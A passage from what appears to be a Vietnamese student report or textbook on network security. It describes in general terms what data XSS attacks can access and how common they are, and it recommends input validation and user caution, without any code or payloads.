- AN NINH MẠNG 27 VIII. PHẠM VI VÀ TÍNH KHẢ THI CỦA PHƯƠNG PHÁP TẤN CÔNG BẰNG XSS Mã JavaScript độc có thể truy cập bất cứ thông tin nào sau đây: • Cookie cố định (của site bị lỗi XSS) đƣợc duy trì bởi trình duyệt. • RAM Cookie (của site bị lỗi XSS) • Tên của tất cả các cửa sổ đƣợc mở từ site bị lỗi XSS • Bất cứ thông tin mà có thể truy cập đƣợc từ DOM hiện tại (nhƣ value, mã HTML ) Trong thời gian vừa qua ta thấy rằng phƣơng pháp tấn công vào lỗi XSS của các trang web vẫn nằm ở con số rất cao chỉ sau SQL Injection. Cho nên phƣơng pháp tấn công XSS vẫn đƣợc coi nhƣ là rất khả thi để thực hiện và việc tấn công vẫn còn rộng rãi. IX. ĐÁNH GIÁ Các hiểm họa trong môi trường Internet Kĩ thuật XSS khá phổ biến và dễ dàng áp dụng, và mức độ thiệt hại của chúng có thể gây những hậu quá rất nghiêm trọng. Vì thế, ngoài việc ứng dụng kiểm tra
- AN NINH MẠNG 28 tính đúng đắn của dữ liệu trƣớc khi sử dụng thì việc cần nhất là ngƣời dùng nên cảnh giác trƣớc khi bƣớc vào một trang Web mới hay khi nhận đƣợc một email rất thu hút nào đó. Có thể nói, nhờ vào sự cảnh giác của ngƣời dùng thì 90% đã đạt đƣợc sự bảo mật trong kĩ thuật này. TÀI LIỆU THAM KHẢO: 1. Security - 2009 - Network security guide – COMPTIA 2. Security - 2010 - 7 deadliest attacks - Web app 3. Bảo vệ một website – Nhóm SV ĐH Bách Khoa TP.HCM 4. 5. 6. 7.